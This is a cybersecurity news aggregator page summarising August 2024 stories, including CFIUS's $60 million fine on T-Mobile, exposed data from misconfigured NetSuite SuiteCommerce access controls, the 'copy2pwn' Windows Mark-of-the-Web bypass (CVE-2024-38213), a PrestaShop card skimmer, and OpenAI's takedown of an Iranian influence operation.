Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for T-Mobile Fined $60 M ...

 Cybersecurity News

The Committee on Foreign Investment in the United States (CFIUS), a U.S. government agency responsible for reviewing foreign investments in the country, has levied a $60 million fine on T-Mobile US, Inc. following a series of unauthorized data access incidents. The infractions occurred between August 2020 and June   show more ...

2021, violating a key provision of a national security agreement (NSA) that T-Mobile entered into as part of its 2020 merger with Sprint Corporation. T-Mobile Breach of National Security Agreement CFIUS approved the merger between T-Mobile and Sprint subject to the agreement, which aimed to mitigate potential national security risks. However, T-Mobile failed to adhere to the agreement by not taking adequate measures to prevent unauthorized access to sensitive data and reporting incidents in a timely manner. As a result, the agency concluded that the T-Mobile breaches harmed the national security interests of the United States. This is the largest penalty imposed by CFIUS to date, with the treasury.gov website containing the following statement: CFIUS determined that between August 2020 and June 2021, in violation of a material provision of the NSA, T-Mobile failed to take appropriate measures to prevent unauthorized access to certain sensitive data and failed to report some incidents of unauthorized access promptly to CFIUS, delaying the Committee’s efforts to investigate and mitigate any potential harm. CFIUS concluded that these violations resulted in harm to the national security equities of the United States. T-Mobile has worked with CFIUS to enhance its compliance posture and obligations and has committed to working cooperatively with the U.S. Government to ensure compliance with its obligations going forward. CFIUS concluded that these violations resulted in harm to the national security interests of the United States, leading to the unprecedented $60 million penalty. Increased Transparency and Enforcement Focus Earlier this week, the U.S. Treasury Department, which chairs CFIUS, unveiled a new CFIUS enforcement website, providing the public and the investing community with greater insight into the committee's compliance and enforcement efforts. "In the last few years, CFIUS has redoubled its resources and focus on enforcement and accountability, and that is by design: if CFIUS requires companies to make certain commitments to protect national security and they fail to do so, there must be consequences," said Assistant Secretary of the Treasury for Investment Security Paul Rosen. “Today’s penalty updates underscore CFIUS’s commitment to accountability and the protection of national security." The website update includes details on all the civil monetary penalties imposed by CFIUS over the past few years, with the T-Mobile penalty being the largest and only incident disclosed directly by name. CFIUS has issued three times more penalties in 2023 and 2024 than it had in its nearly 50-year history, marking its commitment to holding companies accountable.

image for Potential Data Expos ...

 Cybersecurity News

Oracle's NetSuite, a popular Enterprise Resource Planning (ERP) platform, has a feature that allows businesses to deploy an external-facing store using SuiteCommerce or SiteBuilder. This feature enables e-commerce operations and back-office processes within a unified platform, streamlining and automating order   show more ...

processing, fulfillment, and inventory management. However, a recent investigation has uncovered a potential issue in the SuiteCommerce platform that could allow attackers to access sensitive data due to misconfigured access controls on custom record types (CRTs). Addressing Potential Risk in NetSuite's SuiteCommerce According to Aaron Costello, Chief of SaaS Security Research at AppOmni, the issue could potentially affect thousands of live public SuiteCommerce websites. He explains that the problem often arises when organizations deploying NetSuite are unaware that a default stock website has been publicly exposed, even if they had no intention of setting up an e-commerce store. [caption id="attachment_87028" align="alignnone" width="2560"] Source: AppOmni[/caption] The most commonly exposed data appears to be personally identifiable information (PII) of registered customers, including full addresses and mobile phone numbers," Costello said. It's important to note that this is not a security vulnerability in the NetSuite product itself. Rather, it is a potential issue that can arise from how customers configure the access controls within their NetSuite environments. NetSuite uses a multi-layered access control system to protect sensitive data. There are two types of access controls: table-level and field-level. Table-level access controls determine who can see the entire table of data. Field-level access controls determine who can see specific fields within a table. The security risk lies in the way NetSuite's online store feature interacts with the database. When a customer tries to access sensitive information, NetSuite checks the access controls to see if they have permission to view it. If the access controls are not properly set up, hackers can exploit this vulnerability and gain access to sensitive information. Mitigating the NetSuite Vulnerability To protect sensitive information, businesses should ensure that table-level access controls are set to "Require Custom Record Entries Permission" and field-level access controls are set to "None" for public access. To address this risk, the team recommends that NetSuite administrators take a few additional steps: Review access controls on custom record types (CRTs): Ensure the "Access Type" is not set to allow public access without authentication. Restrict access to sensitive fields: Even if table-level access is limited, administrators should review field-level permissions and set sensitive information to have "None" access for unauthenticated users. Consider temporarily taking impacted sites offline: As a temporary measure, organizations may want to take any public-facing SuiteCommerce sites offline until the access controls can be properly configured.

image for Copy2Pwn Vulnerabili ...

 Cybersecurity News

Security experts recently uncovered a vulnerability, CVE-2024-38213, that allows threat actors to bypass Windows' Mark-of-the-Web (MotW) protections through copy-and-paste operations. This vulnerability, dubbed "copy2pwn," highlights the ongoing efforts of cybercriminals to exploit weaknesses in Windows   show more ...

security features and the importance of proactive vulnerability research. Threat of WebDAV Shares Web-based Distributed Authoring and Versioning (WebDAV) is an extension to the Hypertext Transfer Protocol (HTTP) that provides added functionality, including file sharing and versioning. While WebDAV shares can be accessed through web browsers, they can also be mounted as Windows Explorer paths, bypassing the typical MotW protections. [caption id="attachment_87049" align="alignnone" width="1430"] Source: https://www.zerodayinitiative.com/blog/[/caption] Threat actors have increasingly leveraged WebDAV shares to host malicious payloads, taking advantage of vulnerabilities such as CVE-2024-36025 and CVE-2024-21412 to evade built-in Microsoft protections like Windows Defender SmartScreen. By crafting specific Windows search queries, attackers can control the files displayed in the WebDAV share, potentially disguising malicious files as harmless ones. The Mark-of-the-Web is a crucial security feature in Windows that applies an NTFS Alternate Data Stream (ADS) to files downloaded from the internet. This triggers additional security checks and prompts, reducing the risk of executing untrusted content. The MotW is essential for the proper functioning of other protective mechanisms, such as Windows Defender SmartScreen and Microsoft Office Protected View. Without the MotW, these safeguards are rendered ineffective, leaving users vulnerable to malicious content. Researchers from the Zero Day Initiative (ZDI) Threat Hunting team observed the campaign as an update to a previous campaign where DarkGate operators exploited the zero-day vulnerability, CVE-2024-21412, that had been disclosed to Microsoft by researchers. Copy2Pwn Bypasses MotW Protections Before the release of Microsoft's June 2024 security patch, files copied and pasted from WebDAV shares did not receive the MotW designation. This meant that users could unknowingly copy and paste files from a WebDAV share to their desktop, and those files could be opened without the protections of Windows Defender SmartScreen or Microsoft Office Protected View. Researchers observed an increase in threat actors hosting payloads on WebDAV shares. This activity has led to the discovery of numerous vulnerabilities abused as zero-days clustered around accessing malicious payloads from WebDAV shares. The researchers reported CVE-2024-38213 to Microsoft, which had been identified as a 'Windows Mark of the Web Security Feature Bypass Vulnerability' and patched in June. To mitigate against similar clipboard hijacking, pastejacking, and copy2pwn attacks, users should be cautious when accessing WebDAV shares and remain vigilant when copying and pasting files from these sources

 Malware and Vulnerabilities

A recent investigation uncovered a credit card skimmer using a web socket connection to steal credit card details from an infected PrestaShop website. Attackers use web sockets for obfuscation, making it difficult to analyze traffic.

 Feed

OpenAI on Friday said it banned a set of accounts linked to what it said was an Iranian covert influence operation that leveraged ChatGPT to generate content that, among other things, focused on the upcoming U.S. presidential election. "This week we identified and took down a cluster of ChatGPT accounts that were generating content for a covert Iranian influence operation identified as

2024-08
Aggregator history
Saturday, August 17
THU
FRI
SAT
SUN
MON
TUE
WED
AugustSeptemberOctober